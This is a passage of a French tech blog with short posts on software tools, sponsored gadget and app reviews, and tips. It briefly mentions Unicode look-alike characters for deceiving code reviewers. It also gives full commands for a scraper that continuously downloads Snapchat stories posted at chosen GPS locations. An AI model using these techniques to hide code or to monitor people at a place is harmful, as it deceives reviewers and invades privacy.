Dans le même genre, il est également possible de tromper l’auditeur d’un code avec des caractères qui se ressemblent. Par exemple, ce symbole “ǃ” n’est pas un point d’exclamation, mais un caractère Unicode appelé ALVEOLAR CLICK. Vous retrouverez l’ensemble de ces codes baptisés « Confusables » ici.

Vous trouverez tous les détails concernant cette technique ici.

Voici une petite erreur que j’ai rencontrée dernièrement sous macOS au moment de lancer un script Python développé par mes soins.

ssl.SSLCertVerificationError: [SSL: CERTIFICATE_VERIFY_FAILED] certificate verify failed: unable to get local issuer certificate (_ssl.c:1129)

Je me suis bien sûr demandé d’où ça venait, car je n’avais pas modifié mon code. Peut-être une mise à jour de Python. Quoiqu’il en soit, j’ai trouvé la solution, donc je la partage ici en espérant que ça serve à certains. En tout cas, je le note pour moi, histoire que la prochaine fois je perde moins de temps.

Donc si vous rencontrez cette erreur, rendez vous dans le dossier des /Applications de macOS. Localisez le répertoire Python et ouvrez-le.

À l’intérieur, vous verrez un script baptisé « Install Certificates.command ». Il vous suffit alors de double cliquer dessus pour que celui-ci s’exécute et mettre à jour les certificats SSL nécessaires à Python.

Oui, c’est aussi simple que ça.

— Article en partenariat avec Bluetti —

Salut les amis, j’espère que ce début d’année commence bien pour vous et que vous profitez bien des cadeaux que vous avez trouvés au pied du sapin ! De mon côté j’ai pu profiter d’un gros colis envoyé par la société Bluetti : des panneaux solaires et une station de charge ! Autant vous dire que le survivaliste qui dort en moi a frétillé comme un œuf dans sa poêle.

Qui est Bluetti ?

Pour ceux qui ne savent pas vraiment ce que propose la société, je vous fais un petit topo rapide. L’idée de la boite c’est de proposer des sources d’électricité portable et simple à mettre en place ainsi qu’à utiliser. Du panneau solaire mobile pour vous dépanner dans toutes les situations et vous offrir plus de liberté, sans être dépendant d’aucun réseau. Le tout avec un niveau de maintenance très faible (rien à démonter ou à entretenir). De quoi intéresser tous ceux qui veulent vivre en ermite autonomie.

Le petit plus de la société c’est qu’elle développe entièrement tout son matériel, de la carte mère aux contrôleurs, des coques en passant par les onduleurs, etc. Tout est fait maison, ce ne sont pas des composants en marque blanche venus de l’on ne sait où et avec des garanties de fiabilité aléatoires. Pour la petite histoire, tout a démarré il y a quelques années via une campagne de crowdfunding.

OK, maintenant que c’est fait, passons à la présentation de ce qu’ils m’ont envoyé.

Les panneaux solaires : Bluetti SP200 200W

Premier constat lorsque j’ai pris la chose en main : c’est plutôt compact et léger (quelques kg). Cela se présente un peu comme un tapis de gymnastique pliant (environs 2m20 sur 50 cm de haut) qu’il suffit de déplier pour utiliser. Vous avez également des supports qui permettent de soutenir les 4 panneaux indépendamment les uns des autres, il est donc possible d’avoir différentes inclinaisons pour chacun (ce qui serait plus efficace).

Pour ce qui concerne l’aspect technique, Bluetti annonce une puissance de sortie à 95% et une puissance de 200 watts et un rendement des cellules de 23% (cellules en silicium monocristallin). Difficile de vérifier ces éléments sans matériel adéquat (ce que je n’ai pas).

Évidemment les panneaux sont fabriqués en matériaux durables, résistent à la pluie (traitement anticorrosion), mais aussi aux déchirures et autres rayures. Un connecteur et un câble MC4 sont livrés avec et il est possible de connecter plusieurs panneaux en série si vous avez besoin de plus de puissance.

Temps de mise en place : 3 minutes max, fingers in the nose.

La station de charge : Bluetti AC50S

Il suffit de raccorder le câble des panneaux à la station de charge Bluetti AC50S et d’appuyer sur un bouton pour qu’il commence à charger. Effectuer une charge complète prend environ 6 heures selon l’ensoleillement, l’heure de la journée, etc. (peut-être moins en été lorsque le soleil tape plus fort ? Je vous dirai ça dans quelques mois).

Avec ses batteries 500Wh au lithium, son onduleur 300w et sa dizaine de prises (2 AC 220-240v, 2 DC 12v/3A, 4 USB A, 1 USB C … plus un adaptateur) il permet de connecter plusieurs appareils à la fois. Il y a même un chargeur sans fil sur le dessus (pour le smartphone). Il dispose aussi d’un petit écran LCD qui permet de voir l’état de la charge et d’une lampe LED intégrée pour ne pas vous perdre dans le noir.

Comme vous le voyez sur la photo vous pouvez le déplacer très facilement via les poignées, et pour la taille c’est sensiblement la même qu’une grosse radio de notre jeunesse (la vôtre, moi j’ai toujours 18 ans) en un peu plus lourd. Niveau couleur, il existe en bleu et en orange.

Niveau sécurité, si le générateur passe en mode surcharge le groupe électrogène se met directement en protection (fonction SOS), aucun risque de voir votre abri de jardin propulsé dans l’espace en cas d’explosion 😉 L’appareil dispose également d’un système de refroidissement interne (ventilateurs sur les côtés).

Ce que j’ai aussi trouvé assez sympa c’est le peu de bruit que produit l’appareil, c’est discret donc en intérieur ça passe. À noter aussi que la station se recharge non seulement via panneaux solaires, mais aussi depuis une prise de courant classique ou l’allume-cigare de la voiture (les câbles sont fournis, c’est toujours sympa). Bluetti annonce un cycle de vie de plus de 1000 charges.

Niveau des prix le combo reçu tourne autour des 1000 €. Toutefois pour ceux qui veulent, voici un code promo qui vous donne le droit à 100 euros de réduction jusqu’au 31/01/2022 : LUOHUA2 à utiliser sur la boutique Bluetti.

Il y a des solutions moins chères (panneaux solaires 120W au lieu de 200w par exemple) et surtout beaucoup plus chères si vous vous tournez vers des solutions plus puissantes, tout en 1 avec écran tactile, à multiples panneaux solaires, etc.

Que peut-on faire avec un tel système ?

Vous pouvez bien entendu recharger ou utiliser tous vos appareils :

• smartphone, laptop
• drone, appareil photo, routeur
• tout appareil disposant d’un port USB
• enceintes, ventilateur
• cafetière, glacière
• télévision (ahhh regarder le Tour de France au fin fond de la forêt)
• masque respiratoire (pour ceux qui font de l’apnée du sommeil)
• tout autres appareils consommant jusqu’à 300w/heure
• …

Pour vous faire une idée, voici à quoi correspond plus ou moins une charge complète en termes de chiffres concrets : une 40-aine de charges d’un smartphone, 2 jours de lumière faible intensité, une demi-journée d’un mini-frigo, entre 7 et 10 charges de laptop …

Le premier autre avantage auquel j’ai pensé c’est que cela permet de générer un surplus d’électricité de manière ponctuelle ou dans une zone précise. Par exemple pour un cabanon au fond de votre terrain pour lequel vous ne voulez pas faire tirer 200m de câble ni payer une intervention qui coûterait plus cher que le prix des appareils.

Le second c’est bien entendu la portabilité. Pouvoir l’emporter partout avec vous est vraiment pratique dans plusieurs situations : pour les vacances, le camping, si vous menez la van life ou êtes toujours en déplacement, pour générer un surplus d’électricité lors d’un évènement ou d’une soirée en extérieur, pour ne pas dépendre que d’une charge de batterie des outils lorsque vous travaillez loin d’une source d’électricité, etc. 

Utile en cas de panne de courant à la maison. Vous aurez toujours une solution de secours sous la main, plus robuste que les bougies (zavez déjà essayé de recharger votre téléphone à la bougie, c’est long). Vu que le système ne génère pas de bruit ni de fumée, qu’il n’y a pas de combustion d’essence, etc., c’est une solution plutôt safe à utiliser en intérieur.

Le sport. Si vous n’avez pas d’haltères chez vous, vous pouvez toujours vous entraîner à soulever plusieurs fois le groupe électrogène et faire des sauts par-dessus les panneaux. Ben quoi ? Je suis un être humain créatif :p

Mon avis

Alors la luminosité en ce moment, la charge n’a pas été très rapide, mais j’ai vraiment hâte de tester dès qu’il y aura un peu plus de soleil. Le côté portable de la station me permet de l’emmener à l’autre bout du jardin pour pouvoir ensuite y brancher une lampe, une enceinte voire une petite pompe. J’aime beaucoup également la zone de recharge sans fil au-dessus de l’appareil ce qui me permet de charger mon iPhone sans me prendre la tête.

Je n’ai pas encore eu l’occasion de l’emmener dans la voiture, mais si je pratiquais le camping ou la van life, ce serait royal. J’ai essayé de faire tourner le purificateur d’air de Dyson dessus, mais sans surprise, ça n’a pas fonctionné. Je pense que ça tire trop de jus.

Niveau environnement j’avoue ne pas trop savoir ou poser le curseur. D’un côté pouvoir générer de l’énergie renouvelable de cette manière, sans pollution et sur le long terme est une bonne chose. De l’autre il faudrait savoir quel est l’impact écologique dû à la fabrication des différents composants du système et la durée de vie du matériel. Il faudrait donc une étude détaillée et sur la durée pour être fixé.

En attendant ça me fait bien délirer d’apprendre un peu comment fonctionne ce type de système, d’avoir un peu plus d’autonomie en énergie et de vivre avec moins de stress en cas de panne ou de facture EDF impayée 😉

Il va vite devenir mon meilleur ami cet été pour bosser au fond des bois 🙂

Découvrez les produits Bluetti

Si après avoir lu mon formidable article sur la maîtrise de YouTube-dl, vous ne vous en sortez toujours pas, il vous faut une interface graphique !

Et bonne nouvelle, Open Video Downloader est là pour vous servir. Ce logiciel open source qui fonctionne sous macOS, Linux et Windows (car Electron JS ftw) vous permettra de télécharger simplement des vidéos en provenance de YouTube, mais également Vimeo, Twitter et j’en passe.

Il utilise bien sûr Youtube-DL et permet de récupérer soit des vidéos seules, soit carrément des playlists voire l’ensemble du contenu d’une chaine.

Vous pouvez choisir la résolution dans laquelle vous voulez la vidéo, uniquement le son si vous voulez et choper également des vidéos privées grâce au support des cookies.

La GUI est capable de télécharger jusqu’à 32 vidéos en simultanée et comme YouTube DL évolue très vite (car c’est le jeu du chat et de la souris avec les plateformes), et bien Open Video Downloader le mettra à jour automatiquement.

Vous trouverez Open Video Downloader ici.

Le youtubeur Robotanv a mis en ligne un genre de tuto vidéo où il explique comment ajouter un module de recharge sans fil dans la dernière Switch Lite de Nintendo.

Ça n’a pas l’air si compliqué que ça puisqu’une fois ouverte, il y a des points de connexions pour le debug juste derrière le port USB-C sur lequel on peut se rebrancher afin d’y connecte le récepteur Qi.

2 petites soudures et c’est plié !

Qui se lance ?

Si vous cherchez un nouveau moyen pour faire de la documentation collaborative ou collecter des ressources pour ensuite les connecter en elle sous la forme de graphes, il existe un super projet qui s’appelle Telescope.

Développé par Greaby, ce projet permet ainsi d’agréger de la documentation de manière non hiérarchique. Contrairement à un wiki où tout est lié de manière verticale, avec Telescope, on lie les fiches à l’aide de mots clés, ce qui permet ensuite de générer un graphe.

Ensuite l’exploration de la documentation ou des ressources se faire via le graphe. Telescope est totalement collaboratif et le contenu s’ajoute au format Markdown.

Et parce qu’il est passionné de jeux vidéos, Greaby a créé Galaxy GD à l’aide de Telescope, ce qui permet d’avoir un vrai rendu de ce qu’il est possible de générer comme site statique et surtout de pouvoir jouer avec le fameux graphe.

Ça me fait penser à un vieux service dont le nom m’échappe et qui n’existe plus malheureusement qui permettait d’organiser sa veille de manière thématique dans des bulles. C’était sympa et je pense que Telescope à pas mal d’avenir, car ça permet d’organiser de la veille ou de la documentation de manière très naturelle, très organique.

Plus besoin de se prendre la tête à tout catégoriser de manière hiérarchique, ce qui peut vite devenir compliqué quand on a beaucoup de ressources.

Puis ça permet de faire des liens naturellement entre des sujets. Liens, auxquels on n’aurait pas forcément pensé.

À découvrir ici.

Il y a quelques semaines, je partageais avec vous l’existence d’une version 100% en ligne de Visual Studio Code. Et bien il y a encore plus pratique !

Vous voyez, quand vous allez sur un projet Github. Prenons par exemple le projet de YouTube DL. Voici l’URL du dépôt :

https://github.com/ytdl-org/youtube-dl

Et bien il vous suffit simplement de remplacer le .com dans l’URL par un .dev comme ceci :

https://github.dev/ytdl-org/youtube-dl

Et vous tomberez sur un éditeur web Visual Studio qui embarquera tout le projet en question. Apparemment, il y a également un raccourci clavier qui malheureusement ne fonctionne pas chez moi, mais vous pouvez toujours essayer. Il suffit d’appuyer sur la touche « . » (point) de votre clavier pour être redirigé vers l’éditeur.

Dans cet éditeur vous pourrez évidemment consulter l’ensemble des sources du projet, mais également les modifier et pousser vos changements sur le github directement.

Elle n’est pas belle la vie ? Tout est documenté sur le site de Github si vous voulez plus d’infos.

Un grand merci à Olivier pour le partage !

Êtes-vous amateur de podcasts ? Si oui, vous passez peut-être par des plateformes comme Apple Podcast, Google podcast, Deezer, Spotify…etc.

Mais si vous cherchez un truc spécifique, que ce soit une personne, un sujet…etc., vous passez forcément à côté de plein d’épisodes de plein de podcasts qui ne sont peut-être même pas référencés sur ces plateformes.

Heureusement, il existe un site qui s’appelle Listen Notes qui vous permet tout simplement de faire une rechercher textuelle dans l’offre mondiale de podcasts. À partir de cette recherche, vous pourrez alors écouter des épisodes, découvrir de nouvelles chaines ou playlists mais également (et c’est là que ça devient intéressant), créer un flux RSS auquel vous abonner pour ne rien rater ou exporter la liste des résultats en CSV.

Listen Notes existe également sous la forme d’une API et si vous voulez aller plus loin, il faudra prendre l’abonnement super cher à +10$ la journée.

À découvrir ici.

« Files » est un explorateur de fichiers pour Windows nouvelle génération qui propose une nouvelle expérience en matière de design. A priori, ça ressemble pas mal à l’explorateur de fichiers de Windows, mais il y a pas mal de subtilités comme une intégration avec des services clouds (OneDrive, Google Drive, iCloud…etc) pour gérer directement vos documents ou photos depuis « Files ».

Pour vous faire gagner du temps, Files intègre une fonctionnalité d’aperçu qui vous permet de voir ce qu’il y a dans des documents ou de regarder des photos sans avoir à les ouvrir. Du markdown à la lecture de vidéos, beaucoup de formats sont supportés nativement.

Cet explorateur de fichier permet de tout avoir dans la même fenêtre à l’aide d’un système d’onglet et les raccourcis clavier vous permettront de naviguer entre eux et d’effectuer des actions rapides.

Enfin, vous pourrez également tagger les fichiers et les dossiers avec un nom et une couleur pour pouvoir les identifier facilement. Étant utilisateur de macOS, rien de nouveau sous le soleil, mais pour les utilisateurs de Windows, c’est une révolution !!!

En plus, il y a toute une série de thèmes dispo pour ajouter un peu de couleur et de textures à votre explorateur de fichiers.

L’outil est open source et téléchargeable sur le Windows Store

Que vous ayez des vidéos à retravailler, des fichiers audio à triturer ou des PDF à manipuler, une seule adresse : 123apps.com

Ce site est un genre de boite à outils en ligne qui permet de faire plein de trucs. Trop de trucs d’ailleurs. Sur la vidéo, il y a un éditeur qui vous permettra de réaliser des choses comme couper la vidéo, la recadrer, changer sa taille, modifier le volume, cacher un logo, ajouter du texte par-dessus, stabiliser une vidéo de fin de soirée…etc.

L’éditeur vidéo est sans doute la partie la plus intéressante de 123apps car il propose des fonctionnalités de base accessibles facilement depuis le navigateur, ce qui vous évitera d’installer un vrai logiciel un peu lourdingue pour un petit recadrage à 2 balles.

Concernant l’audio, 123apps vous permet de fusionner des fichiers, changer le BPM, égaliser le son, enregistrer une voix…etc. Bon pour les PDF c’est comme d’habitude. Fusionner des documents, convertir des JPG/DOC/XLS/PNG…etc. en PDF et vice versa ou encore mettre des mots de passe ou compresser un gros document.

123apps propose également toute une série de convertisseurs (audio, video, image, ebooks…etc.).

Bref, un bon petit site à bookmarker pour vos opérations courantes.

Besoin de faire une sauvegarde de votre disque dur et vous ne savez pas quel outil utiliser ? Ne cherchez plus et déployez Redo Rescue sur une clé USB ou un CD. Démarrez ensuite votre ordinateur avec et voilà, vous pourrez sauvegarder et restaurer l’ensemble de votre système.

Cela vous permettra d’être opérationnel rapidement en cas de panne ou de changement d’ordinateur. Redo Rescue intègre VNC pour que vous puissiez vous faire accompagner par votre cousin geek. Et l’outil est capable de détecter les partages réseau pour y poser ou récupérer vos images de sauvegardes. Ainsi vous pourrez faire des sauvegardes locales ou via le réseau (SSH et FTP également).

L’outil est compatible avec UEFI / Secure Boot et saura régénérer la MBR et la table des partitions en cas de changement de matériel.

Redo Rescue est basé sur une Debian et utilise partclone, le moteur de clonage utilisé par Filezilla.

À télécharger ici.

Il y a vraiment plein de jeux gratuits partout qui sont vraiment très cool. Je pense par exemple à tout ce que regroupe le site Poki mais également Itch.io.

D’ailleurs en parlant de Itch.io, vous y trouverez le jeu Hexblade jouable sous Windows ou directement dans votre navigateur sur toutes les plateformes. Il s’agit d’un jeu de plateforme dans lequel vous incarnez un guerrier nommé le « chevalier du sang » qui à l’aide de sa grosse épée part explorer un donjon.

Dans quel but me direz-vous ? et bien pour retrouver 3 épées mythiques et surtout mortelles forgées par le grand maître des épées. Évidemment, ce n’est pas une promenade de santé, puisque rempli de boss redoutables à buter.

Le secret pour vaincre chaque Boss est de sauter et frapper au bon moment, donc de trouver la bonne chorégraphie. Exactement comme à l’époque de la Super NES où les jeux étaient difficiles :-).

Ainsi, après avoir vaincu chaque Boss, vous obtiendrez une nouvelle compétence pour être plus fort au niveau suivant.

Voilà, super jeu avec une bonne bande-son bien rétro et des sensations de jeu comme on n’en fait plus. Son créateur s’appelle Rodjer Goulart et vous trouverez ses autres créations ici.

À découvrir ici !

Si vous êtes utilisateur d’Instagram et collectionneur, vous avez peut-être envie de collectionner les stories des gens que vous aimez et que vous suivez sur Instagram.

Ça fait un peu fétichiste dit comme ça, mais bon, ça peut toujours dépanner de savoir télécharger facilement une story ou une vidéo classique à partir d’Insta en 1 clic.

Et pour cela, il suffit d’aller sur le site Story Saver. Vous entrez simplement le pseudo du compte dont vous voulez récupérer les vidéos et taadaaa, y’a plus ensuite qu’à cliquer sur les petits boutons bleus « Save Video ».

De quoi vous faire un bel archivage de stories Instagram ou tout simplement un backup de votre propre contenu.

Easy !

— Article en partenariat avec Setapps —

Toujours dans mon exploration du service Setapp, après vous avoir expliqué comment mieux gérer votre temps, j’ai voulu regarder un peu ce qu’ils proposaient en matière de sécurité. Pour rappel, Setapp est un peu le Netflix de l’application macOS. Pour moins de 10$ par mois, vous aurez accès en illimité à plus de 220 applications payantes. Setapp fonctionne comme un AppStore, sauf qu’au lieu de payer chaque application à l’unité, vous avez accès à tout le catalogue.

Protégez votre Mac

Pour renforcer la sécurité de votre Mac, je vous propose d’abord d’auditer un peu la configuration de celui-ci, notamment avec Pareto Security.

Cette application vérifie que vous utilisez bien toutes les fonctionnalités de sécurité natives implémentées dans macOS. Il faut voir ça comme une checklist qui vous dira si vous avez activé ou non certaines protections sur votre macOS. Je pense par exemple au Firewall, à Filevault, aux mises à jour, à la sécurité de vos clés SSH…etc.

Pour chaque point à contrôler, vous aurez une documentation claire qui vous indiquera comment faire pour activer telle ou telle sécurité. Vraiment pratique !

Sauvegardez vos données

Un autre aspect de la sécurité qui est négligé, ce sont les sauvegardes. Dans Setapp vous trouverez plusieurs applications pour faire des backups mais celui que je préfère s’appelle Get Backup Pro. Cet outil vous permet de programmer des sauvegardes régulières qui peuvent être une simple copie de fichiers, une copie incrémentale avec ou sans suivi de version et pour les plus furieux un clonage du disque.

Le backup incrémental permet de gagner pas mal d’espace et si vous optez pour la synchronisation des dossiers, vous pourrez garder une copie à jour de vos documents sur plusieurs Mac en même temps.

Enfin, vous le savez, restaurer une sauvegarde prend du temps alors en cas de pépin matériel, si vous avez opté pour un clonage du disque, il vous suffit de démarrer directement sur le disque de sauvegarde et votre système bootera à l’identique. C’est super pratique !

Entretenez votre Mac

Enfin, pour l’entretien de votre Mac, une application que j’utilise depuis des années, c’est CleanMyMac X.

Elle est proposée dans Setapp et cela vous permet de libérer de l’espace sur votre disque dur en le nettoyant, mais également de réparer certains problèmes, détecter d’éventuels malwares ou encore de trouver les gros fichiers inutiles qui bouffent trop de place sur votre disque sans même que vous vous en doutiez.

CleanMyMac vous permet également de désinstaller les applications que vous utilisez le moins voire plus du tout.

C’est vraiment pratique et ça permet d’éviter que votre système d’exploitation s’encroûte avec le temps !

Voilà, j’espère que cette petite sélection d’outils macOS vous aura donné envie de chouchouter votre Mac.

Toutes ces applications et bien d’autres sont disponibles dans le magasin d’application Setapp et sachez que vous pouvez tester ces +220 applications gratuitement durant 7 jours avec l’offre d’essai de Setapp.

Si vous êtes photographe ou graphiste et que vous souhaitez partager des images avec un client ou des amis, voici le service le plus simple qui existe !

Encore plus easy que WeTransfer !

Cela s’appelle Folio.link et ça permet d’uploader vite fait bien fait de très nombreuses images qui seront ensuite consultables directement via un lien partageable. Les images peuvent être défilées très rapidement et surtout téléchargeables d’un simple clic.

Si vous êtes le créateur de porte-folio, vous pouvez également ajouter de nouvelles images. Vos albums resteront accessibles pendant 90 jours.

Bref, très simple et super utile !

À bookmarker d’urgence !

DevilutionX est un portage de Diable et Hellfire qui a été conçu pour fonctionner sur des OS récents… Windows, macOS et bien sûr Linux pour enfin retrouver les sensations que vous aviez lors de vos premières parties de Diablo. Des versions pour Switch, PS Vita, Android, 3DS et j’en passe sont dispo également.

Évidemment, le moteur a été largement amélioré, de nombreux bugs ont été corrigés et quelques nouvelles fonctionnalités ont même été ajoutées. C’est sans doute l’un des meilleurs portages.

Bien sûr pour y jouer, vous devrez avoir une version originale de Diablo ou Diablo HellFire. Une fois DevilutionX téléchargé, placez le fichier d’assets fonts.mpq et devilutionx.mpq dans le même répertoire que l’application.

Puis copiez le fichier DIABDAT.MPQ du jeu original au même endroit pour jouer à Diablo. Et pour Hellfire, c’est pareil sauf que vous devez copier hellfire.mpq, hfmonk.mpq, hfvoice.mpq et hfmusic.mpq.

Lancez ensuite DevilutionX et c’est parti pour des heures et des heures de Diablo. Le pieds pour s’amuser pendant les vacances.

Si vous avez une chaine YouTube, vous recevez probablement des commentaires. Des sympas, des pas sympas et surement un paquet de spammeurs et autres escrocs qui essayent de prendre dans leurs filets vos abonnés.

Et malheureusement, YouTube ne fait pas grand-chose en matière de nettoyage. Heureusement, Thio Joe a mis au point un outil pour Windows, Linux et macOS qui permet de purger l’ensemble des commentaires d’une même personne sur une vidéo particulière ou sur l’ensemble de votre chaine YouTube.

Vraiment pratique !

La recherche peut être ciblée par pseudo ou totalement automatisée en fonction de certains caractères. Et une fois lancé, c’est parti pour le grand ménage. Vous aurez tout de même besoin d’une clé API YouTube pour que le script puisse faire correctement son job.

Voici comment ça fonctionne en vidéo :

Voilà un outil qui va plaire aux curieux ou à ceux qui font un peu de renseignement. Vous le savez sûrement, Snapchat permet de suivre ce qui se passe sur la planète grâce à une carte accessible ici, qui affiche toutes les stories du moment.

En se baladant sur la carte, on peut ainsi voir ce qui se passe à tel ou tel endroit, ce qui est vraiment cool pour vivre par procuration certains événement ou tout simplement s’imprégner d’une ambiance ou regarder le temps qu’il fait à l’autre bout de la planète.

Avec le script Snapchat Story Downloader, vous allez pouvoir effectuer des recherches sur la carte Snapchat aux endroits voulus et télécharger toutes les stories pour les regarder et les classer ultérieurement.

Comme on ne sait pas vraiment comme Snapchat détermine les vidéos qui apparaîtront sur la carte, le script est capable de « randomiser » la géolocalisation de quelques centaines de mètres pour espère avoir plus de résultats.

Pour installer l’outil, lancez les commandes suivantes :

git clone https://github.com/nemec/snapchat-map-scraper.git
cd snapchat-map-scraper/
# créer un environnement virtualisé
python3 -m venv env
# activer l'environnement virtualisé
source env/bin/activate
#installer les dépendances
pip3 install -r requirements.txt

Créez ensuite la base de données du lieu qui vous intéresse:

python3 story_downloader.py create snap.db

Puis chopez les coordonnées GPS en regardant l’URL de l’endroit que vous ciblez sur la carte.

Ainsi, à partir de cette url :

https://map.snapchat.com/@48.870226,2.305133,16.53z

On peut lancer la commande suivante :

python3 story_downloader.py add --database snap.db --label "Champs Elysées" 48.870226 2.305133

Puis:

python3 story_downloader.py scrape --database snap.db --randomize --repeat

Et voilà, toutes les 120 secondes, les nouvelles vidéos et photos seront automatiquement téléchargées dans le dossier /media du projet.

Amusez-vous bien et joyeux Noël !

Le morphing, c’est toujours rigolo. Mélanger le visage de personne pour voir le résultat d’un éventuel « enfant » ou en tout cas mélange génétique, ça peut faire flipper, mais ça dépend qui vous mélangez.

Pour tester ça chez vous, il y a le site Facemorph.me qui utilise StyleGan2 pour générer des visages à partir de vraies photos et les mélanger entre-elle. Sur le site, il y a beaucoup de visages déjà existants, mais le plus fun c’est d’uploader votre propre photo pour obtenir une version « Wish » de vous-même.

Par exemple :

Le fait que cette image en entrée soit régénérée permet d’obtenir un excellent rendu au niveau du morphing.

Et ensuite, vous faites la même chose en face et vous obtiendrez une vidéo morphing dont les arrêts sur image seront mémorables.

Par exemple, saviez-vous qu’en mélangeant Emmanuel Macron avec Brigitte Macron, on obtient David Pujadas ? C’est fou non ?

Amusez-vous bien, vous allez y passer des heures !

Hello

Je profite d’une insomnie qui m’a sorti du lit à 4h du matin (la malédiction des vacances) pour vous remercier encore pour votre soutien et cette année passée en votre compagnie. Le site a failli ne pas survivre à 2021, mais grâce aux soutiens sur Patreon et à ma détermination, 2022 s’annonce radieux (enfin, je veux y croire, en tout cas ça rime).

Pour ma part, dès demain soir, un petit coton tige dans le nez et en avant pour un combo Noël + Nouvel an en comité réduit.

Je pense également à tous ceux parmi vous qui vont passer ces fêtes devant leur écran. Je ne vous oublie pas et je vous ai programmé des articles pendant toute cette période un peu relool (relou et cool à la fois).

Bref, amusez-vous bien et à très vite !

Si vous voulez une jolie image pour présenter un site web dans différents navigateurs comme Firefox, Safari, Edge, Internet Explorer, Opera ou Chrome, j’ai ce qu’il vous faut.

Cela s’appelle BrowserFrame et c’est un site où vous rentrez l’URL de votre choix puis vous sélectionnez le navigateur et voilà, vous obtenez une image que vous pouvez télécharger. D’autres options de personnalisation sont également disponibles comme la possible d’ajouter du padding, changer la couleur du fond, accentuer les ombres, augmenter la taille de l’image…etc.

Pratique pour illustrer un site, de la documentation ou placer ça sans quelques maquettes.

Maitriser Git n’est pas forcement simple pour les débutants. Mais même pour les experts, on n’a pas tout en mémoire et parfois une commande nous échappe. Alors évidemment, il y a Google, mais pourquoi écumer les forums ou Stackoverflow quand on peut tout simplement se rendre sur Git Explorer.

Ce site vous permet de sélectionner l’action que vous voulez effectuer avec Git pour obtenir la ligne de commande qui va bien.

Super simple et super pratique ! Et si vous voulez l’installer sur votre machine ou l’améliorer, c’est sous licence libre et c’est ici.

— Article en partenariat avec Setapps —

Si vous êtes sous macOS et que vous êtes un gros consommateur d’application, vous connaissez peut-être le service Setapp qui contre un abonnement de moins de 10 $ par mois, vous donne accès en illimité à plus de 220 applications payantes. Setapp fonctionne comme un AppStore, sauf qu’au lieu de payer chaque application à l’unité, vous avez accès à tout le catalogue en illimité. On pourrait comparer Setapp au Netflix de l’application.

Il y en a évidemment pour tous les goûts, avec des outils pour nettoyer vos mac, pour étancher votre soif de créativité, pour votre productivité, pour écrire, pour gérer vos finances…etc et il y a même des applications iOS dans le lot.

Du coup, aujourd’hui, j’ai choisi de vous présenter 2 applications qu’on retrouve dans Setapp et qui vous permettront de mieux vous organiser.

Pour ne plus rien oublier

La première s’appelle Due et permet de configurer des timers (compte à rebours) ou des rappels automatiques pour ne plus jamais rien oublier. Si vous avez des échéances à respecter pour vos clients, le besoin d’être prévenu lorsque c’est le moment d’arrêter le boulot ou ne pas oublier un rendez-vous important, Due vous permettra de ne plus rien manquer.

Pas besoin de vous galérer à sélectionner un jour, une heure ou une fréquence. Il suffit de l’écrire et voilà. C’est hyper fluide et surtout, Due vous permet de « snoozer » (reporter) certains rappels, mais continuera ensuite à vous rappeler vos tâches jusqu’à ce que vous les marquiez comme effectués.

Les timers sont également très cool si par exemple vous voulez limiter certaines actions, ou si vous travaillez en suivant la méthode Pomodoro.

Avec cet outil, impossible de faire passer un truc à la trappe. Indispensable pour les têtes en l’air !

Pour mieux gérer votre temps

Un autre outil que j’ai utilisé pendant longtemps lorsque je faisais de la prestation, c’est Be Focused. Cet outil vous permet très facilement de mesurer et suivre le temps que vous passez sur toutes vos taches. D’un simple clic, vous commencez une tâche, le compteur démarre, vous bossez et lorsque vous avez fini, vous stoppez le Timer. Be Focused se charge alors d’agréger le temps passé sur vos tâches.

Ainsi, vous saurez exactement où vous en êtes et vous pourrez plus facilement facturer vos clients si vous faites de la prestation horaire ou tout simplement auto évaluer le temps que vous passez sur certaines actions. On peut exporter en CSV les statistiques.

Be Focused vous permet surtout de diviser de grosses tâches en plus petites pour pouvoir y venir à bout et surtout de vous concentrer sur vos tâches sans interruption.

Bref, que ce soit pour ne plus passer trop de temps sur certaines choses, pour comptabiliser votre temps ou suivre vos objectifs personnels, c’est vraiment un outil super pratique !

Toutes ces applications et bien d’autres sont disponibles dans le magasin d’application Setapp et sachez que vous pouvez tester ces +220 applications gratuitement durant 7 jours avec l’offre d’essai de Setapp.

Si vous cherchez un outil simple et sympa pour comparer des fichiers voire des répertoires y compris sous versioning (Git), je vous présente Meld.

Ce logiciel libre dispo sous Linux et Windows (et sous Mac mais pas à jour) permet de faire de la comparaison avec 2 ou 3 fichiers en même temps, le tout en temps réel (la comparaison évolue lorsque vous éditez le fichier. Et bien sûr, vous pouvez fusionner automatiquement les fichiers ou manuellement avec quelques clics bien placés.

Meld support Git, mais également Bazaar, Mercurial, SVN…etc ce qui permet de comparer des fichier avant tout commit.

Si vous voulez tester, c’est par ici que ça se passe.

Firefox est mon navigateur préféré et je n’ai aucun mérite, car tout simplement le meilleur ! En tout cas, si vous utilisez Firefox, vous allez kiffer cet article où je vais vous présenter : Firefox Profilemaker.

Il s’agit d’un service en ligne qui permet de créer de toute pièce un profil Firefox personnalisé aux petits oignons. Étape par étape, vous devrez choisir les options que vous voulez activer ou désactiver. Vous pouvez par exemple stopper la lecture automatique des tags <video>, désactiver la télémétrie, le DNS over HTTPS, Firefox suggest…etc ou encore préinstaller des extensions comme HTTPS Everywhere, CanvasBlocker ou uBlock Origin.

Vous pouvez même ajouter un user agent personnalisé. Il y a vraiment beaucoup, beaucoup, beaucoup de paramètres modifiables, donc vous allez y passer un peu de temps, mais ensuite, vous aurez un profil Firefox tout prêt et totalement en accord avec vos besoins et valeurs.

Ensuite, le site vous proposer de télécharger un zip contenant votre profil. Pour le déployer tout en gardant votre ancien profil, vous pouvez lancer Firefox comme ceci :

firefox -no-remote -ProfileManager

Sinon, rendez-vous sur

about:profiles

Et cliquez sur un des boutons « Afficher dans le Finder ». À partir de là, fermer Firefox, supprimer tout ce qui se trouve dans le dossier « Profiles » puis décompresser le nouveau profil généré depuis le site ffprofile. Relancez Firefox et voilà !

Avec l’arrivée du web 2.0, certains espéraient qu’Internet allait s’enrichir grâce à la douce pensée de chacun, aux débats respectueux, aux avis éclairés, le tout dans une émouvante bienveillance.

Mais au fil des années, ce fameux web participatif, réseaux sociaux en tête, est principalement devenu une foire aux « commentaires », la plupart du temps rageux et vides de sens. Et c’est bien dommage.

Alors bien sûr les plateformes comme YouTube ont tenté de canaliser cette violence dans des indicateurs comme le compteur de dislikes (pouces rouges) qui permettaient aux rageux flemmards de signaler leur existence sans pour autant verbaliser leurs sombres pensées.

